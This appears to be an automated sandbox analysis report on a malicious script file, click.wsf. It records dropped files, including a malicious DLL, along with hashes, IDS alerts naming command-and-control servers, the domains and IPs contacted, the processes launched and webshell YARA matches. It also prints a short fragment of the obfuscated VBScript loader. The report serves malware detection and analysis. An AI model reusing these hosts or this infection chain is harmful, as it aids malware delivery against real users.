Number of new started drivers analysed: 0
Number of existing processes analysed: 1
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: click.wsf
Detection: MAL
Classification: mal100.troj.evad.winWSF@5/8@3/54
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 50.2% (good quality ratio 42.4%)
        • Quality average: 60.5%
        • Quality standard deviation: 35.6%
        HCA Information:
        • Successful, ratio: 80%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .wsf
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
        • TCP Packets have been reduced to 100
        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.253.95.121, 8.241.121.126, 8.241.123.126, 8.248.135.254, 67.27.234.126
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, login.live.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        Time | Type | Description
        09:06:48 | API Interceptor | 2x Sleep call for process: wscript.exe modified
        09:07:20 | API Interceptor | 8x Sleep call for process: regsvr32.exe modified
        No context
        Process:C:\Windows\System32\regsvr32.exe
        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
        Category:dropped
        Size (bytes):62582
        Entropy (8bit):7.996063107774368
        Encrypted:true
        SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
        MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
        SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
        SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
        SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.
        Process:C:\Windows\System32\regsvr32.exe
        File Type:data
        Category:modified
        Size (bytes):328
        Entropy (8bit):3.127437612314223
        Encrypted:false
        SSDEEP:6:kKnMAry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:PMoCvkPlE99SNxAhUext
        MD5:DB2EC1D25EBBF63A67B76A991DE9381B
        SHA1:ED66F35D9308016B4F276CC09C3B2116669070E5
        SHA-256:E7E343FE929301E443F44F2842348A4875C87ABD0CF3B2F29403C96A660344AA
        SHA-512:03D7D4AE006B25E50EA4F98ADD852997D7E11A6064AE0334A2BA0D0056E15F5C432990EDC79FA4C00F57A0A44C71982DC302636E17F46A95CAE85814AF7400FC
        Malicious:false
        Preview:p...... ........Z.L..[..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...
        Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:old-fs dump file (16-bit, assuming PDP-11 endianness), Previous dump Thu Jan 1 01:07:36 1970, This dump Thu Jan 1 01:09:04 1970,
        Category:modified
        Size (bytes):8192
        Entropy (8bit):4.3056677894243895
        Encrypted:false
        SSDEEP:48:oG+4F4x8t4OU4oxJN4rXVJVpV+VuVSV1y8wfZu+E+d2nYgFxvZPEGsj6xYw6vMI:TU8c9dK2nrFrTCMI
        MD5:8A4B17DA69383C75316D7488A1F36DEB
        SHA1:04AA89B2ECD1EA38D81AD9865450CF02F9A709C5
        SHA-256:882EE2DE3174D9BA48B2B58B5ACEA99F69EB8D5594F7ED2DD5C6C7FA47B71B2A
        SHA-512:E397B0E0D7701583A8E2CCD097E78A881C826B7DC0696595107657DEDEF826FAED3D522C80605ED83B7119081667DA58730A65BFE6828C25BF7E02404AD8A654
        Malicious:false
        Preview:........0........_k..[..&........................... ...h.1.<...8 .~<...X...........$.....?..[..#..*...C.L...0T.j...................B.........................[.X...........$.....?..[..#..*...C.L...0T.j...............[...B.........................f.`...........$.....?..[..#..*...C.L...0T.i................&..B...............................................$.....?..[..0.K(.J.J.C...............@....... ..B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...C.l.o.u.d.S.e.t.t.i.n.g.s...D.e.f.a.u.l.t.E.n.a.b.l.e.d.S.t.a.t.u.s...].......0.0.............$.....?..[..0.K(.J.J.C...............@........1.B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...R.i.p.C.o.r.d...4.7.2.6.4.2.8...........0.P...........$....HF..[....{(.Z/K.i.a..ZIs.................9.B...................P...........$....HF..[....{(.Z/K.i.a..ZIt.................F.B...................P...........$....HF..[....{(.Z/K.i.a..ZIs.................M.B...................P...........$....HF..[..
        Process:C:\Windows\System32\wscript.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):9
        Entropy (8bit):2.94770277922009
        Encrypted:false
        SSDEEP:3:tWn:tWn
        MD5:07F5A0CFFD9B2616EA44FB90CCC04480
        SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
        SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
        SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
        Malicious:true
        Preview:badum tss
        Process:C:\Windows\System32\wscript.exe
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):381
        Entropy (8bit):5.035593451835013
        Encrypted:false
        SSDEEP:6:pn0+Dy9xwq8B0hEr6VHB0SpMAcg/EzBoAuZ2A3b1AYDAJgXPUhA1QCV2AmWZW5Kk:J0+oxb8ShRZSS146Ai2A3JAhSPEAr1mP
        MD5:118A489422BE0C5CA0CECF3BB7903C7E
        SHA1:B90AF089FD0E728E61D532BE80062AED39D98978
        SHA-256:FF6D14F77E27F7B90CB2F20BCE408189F5F388961F3FCD13FE2DF2CC0A002DC3
        SHA-512:283CD22F52BCCB8DD22A8772E8121302A6975F2DE35540122F1F7B38953F0BB015831999733884686C1A9019034D2CC113F81245F53B84EDD02B8ADB94638D40
        Malicious:true
        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>401 Unauthorized</title>.</head><body>.<h1>Unauthorized</h1>.<p>This server could not verify that you.are authorized to access the document.requested. Either you supplied the wrong.credentials (e.g., bad password), or your.browser doesn't understand how to supply.the credentials required.</p>.</body></html>.
        Process:C:\Windows\System32\wscript.exe
        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
        Category:dropped
        Size (bytes):316928
        Entropy (8bit):7.337848702590508
        Encrypted:false
        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
        MD5:BFC060937DC90B273ECCB6825145F298
        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 79%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
        File Type:data
        Category:dropped
        Size (bytes):5139
        Entropy (8bit):1.8507519303077096
        Encrypted:false
        SSDEEP:24:Wc/c7JJJPfffffH/jCzDPLAh9ECN/+mMcoqqxGU5nuIIHq+NX9:YNfffffHOriv8xmIID9
        MD5:93EDBC6244E8383ED60A93DF93EA281C
        SHA1:0BB0BC49B90C8D15BDD689A740966BF9610A6F1F
        SHA-256:E32D3D4439E07830ADC99B5660C3195D6DE0CFDC10310711D137842D3B6EDA2D
        SHA-512:4DCDFD96F36EB44C639A82202E2BAD9D254EEBF943C3308078BCC7DFD05AAEC2522C28D26730C87E76849BAD2C98CD8E2BDC85B952682C22429D26904C5B0FE9
        Malicious:false
        Preview:.................F.............................................................."...............\.......................@................f...........................................................................................................................................................................................................................................................................................................................................................................h........\.......@...........s...`........$......b.......f........I...... ................y......r.......`...............D...s...d.......................p...................s...|...................s...|...................s...|...................s...|...................s...|...................s...................................................................................................................................................<........<......n...s...D.......@S..........s...........
        Process:C:\Windows\System32\regsvr32.exe
        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
        Category:dropped
        Size (bytes):316928
        Entropy (8bit):7.337848702590508
        Encrypted:false
        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
        MD5:BFC060937DC90B273ECCB6825145F298
        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 79%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
        File type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
        Entropy (8bit):5.21695797640856
        TrID:
          File name:click.wsf
          File size:55114
          MD5:016fa961b9af49d75b597c2f61ab344c
          SHA1:2fee0634cfa2988ee8f000724efc1c6c18beef23
          SHA256:8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd
          SHA512:4b58acb7111c383b0512352d86a3564d0a5167559d402d330ff7167a6e0ae2cf464096bba3a0936a566e3c2a9b0ffc4d448322c86658ed449e14fb46ad8fbdb8
          SSDEEP:768:w9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:QTVdaeNtuXndH
          TLSH:313362F0AC025C0AE123D977B1BB561359C052FD42683B26FC6D507AE678E3096DD8EB
          File Content Preview:<job id="1cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyext
          Icon Hash:e8d69ece869a9ec4
          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
          03/20/23-09:07:57.133517 | TCP | 2404314 | ET CNC Feodo Tracker Reported CnC Server TCP group 8 | 49735 | 80 | 192.168.2.3 | 187.63.160.88
          03/20/23-09:07:41.132019 | TCP | 2404312 | ET CNC Feodo Tracker Reported CnC Server TCP group 7 | 49734 | 443 | 192.168.2.3 | 182.162.143.56
          03/20/23-09:08:15.086032 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49738 | 8080 | 192.168.2.3 | 104.168.155.143
          03/20/23-09:07:19.650620 | TCP | 2404344 | ET CNC Feodo Tracker Reported CnC Server TCP group 23 | 49731 | 8080 | 192.168.2.3 | 91.121.146.47
          03/20/23-09:08:10.886539 | TCP | 2404308 | ET CNC Feodo Tracker Reported CnC Server TCP group 5 | 49737 | 443 | 192.168.2.3 | 164.90.222.65
          03/20/23-09:08:05.635641 | TCP | 2404310 | ET CNC Feodo Tracker Reported CnC Server TCP group 6 | 49736 | 8080 | 192.168.2.3 | 167.172.199.165
          03/20/23-09:07:25.133944 | TCP | 2404330 | ET CNC Feodo Tracker Reported CnC Server TCP group 16 | 49733 | 7080 | 192.168.2.3 | 66.228.32.31
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Mar 20, 2023 09:06:37.277081966 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:37.277157068 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:37.277278900 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:37.281250954 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:37.281287909 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:37.856724977 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:37.856918097 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:37.862493992 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:37.862519979 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:37.862912893 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:37.902910948 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:38.086049080 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:38.086101055 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:38.453761101 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:38.453893900 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:38.454015970 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:38.454215050 CET | 49727 | 443 | 192.168.2.3 | 203.26.41.131
          Mar 20, 2023 09:06:38.454250097 CET | 443 | 49727 | 203.26.41.131 | 192.168.2.3
          Mar 20, 2023 09:06:38.756974936 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:38.757046938 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:38.757178068 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:38.758169889 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:38.758207083 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:38.898732901 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:38.898938894 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:38.901292086 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:38.901318073 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:38.901609898 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:38.902482033 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:38.902502060 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:39.005121946 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:39.005261898 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:39.005364895 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:39.007162094 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:39.007194042 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:39.007216930 CET | 49728 | 443 | 192.168.2.3 | 31.31.196.172
          Mar 20, 2023 09:06:39.007227898 CET | 443 | 49728 | 31.31.196.172 | 192.168.2.3
          Mar 20, 2023 09:06:39.700891018 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:39.700946093 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:39.701098919 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:39.711879969 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:39.711910009 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.441551924 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.441704988 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:40.444323063 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:40.444350958 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.444715023 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.445736885 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:40.445763111 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.871501923 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.871726036 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.871889114 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:40.871921062 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:40.921637058 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.103441954 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.103568077 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.103580952 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.103604078 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.103643894 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.103651047 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.103668928 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.103671074 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.103719950 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.103815079 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.103898048 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.335499048 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.335558891 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.335699081 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.335710049 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.335740089 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.335784912 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.335819006 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.335894108 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.336009026 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.336385965 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.336483002 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.336533070 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.336610079 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.336978912 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.337086916 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.567697048 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.567724943 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.567856073 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.567913055 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.567944050 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.568010092 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.568078041 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.568078995 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.568108082 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.568233967 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.568310022 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.568434954 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.568497896 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.568624020 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.568809986 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.568912029 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.569062948 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.569207907 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Mar 20, 2023 09:06:41.569339991 CET | 443 | 49729 | 186.202.153.5 | 192.168.2.3
          Mar 20, 2023 09:06:41.569442987 CET | 49729 | 443 | 192.168.2.3 | 186.202.153.5
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Mar 20, 2023 09:06:36.428728104 CET | 60008 | 53 | 192.168.2.3 | 1.1.1.1
          Mar 20, 2023 09:06:37.266818047 CET | 53 | 60008 | 1.1.1.1 | 192.168.2.3
          Mar 20, 2023 09:06:38.496239901 CET | 53710 | 53 | 192.168.2.3 | 1.1.1.1
          Mar 20, 2023 09:06:38.754851103 CET | 53 | 53710 | 1.1.1.1 | 192.168.2.3
          Mar 20, 2023 09:06:39.017168045 CET | 55103 | 53 | 192.168.2.3 | 1.1.1.1
          Mar 20, 2023 09:06:39.699096918 CET | 53 | 55103 | 1.1.1.1 | 192.168.2.3
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Mar 20, 2023 09:06:36.428728104 CET | 192.168.2.3 | 1.1.1.1 | 0x4e7e | Standard query (0) | penshorn.org | A (IP address) | IN (0x0001) | false
          Mar 20, 2023 09:06:38.496239901 CET | 192.168.2.3 | 1.1.1.1 | 0x4d17 | Standard query (0) | bbvoyage.com | A (IP address) | IN (0x0001) | false
          Mar 20, 2023 09:06:39.017168045 CET | 192.168.2.3 | 1.1.1.1 | 0x8dc3 | Standard query (0) | www.gomespontes.com.br | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Mar 20, 2023 09:06:37.266818047 CET | 1.1.1.1 | 192.168.2.3 | 0x4e7e | No error (0) | penshorn.org | - | 203.26.41.131 | A (IP address) | IN (0x0001) | false
          Mar 20, 2023 09:06:38.754851103 CET | 1.1.1.1 | 192.168.2.3 | 0x4d17 | No error (0) | bbvoyage.com | - | 31.31.196.172 | A (IP address) | IN (0x0001) | false
          Mar 20, 2023 09:06:39.699096918 CET | 1.1.1.1 | 192.168.2.3 | 0x8dc3 | No error (0) | www.gomespontes.com.br | gomespontes.com.br | - | CNAME (Canonical name) | IN (0x0001) | false
          Mar 20, 2023 09:06:39.699096918 CET | 1.1.1.1 | 192.168.2.3 | 0x8dc3 | No error (0) | gomespontes.com.br | - | 186.202.153.5 | A (IP address) | IN (0x0001) | false
          • penshorn.org
          • bbvoyage.com
          • www.gomespontes.com.br
          • 164.90.222.65


          Target ID:0
          Start time:09:06:33
          Start date:20/03/2023
          Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
          Imagebase:0x7ff64d520000
          File size:41778000 bytes
          MD5 hash:CA3FDE8329DE07C95897DB0D828545CD
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Target ID:1
          Start time:09:06:34
          Start date:20/03/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
          Imagebase:0x7ff7e91a0000
          File size:165888 bytes
          MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
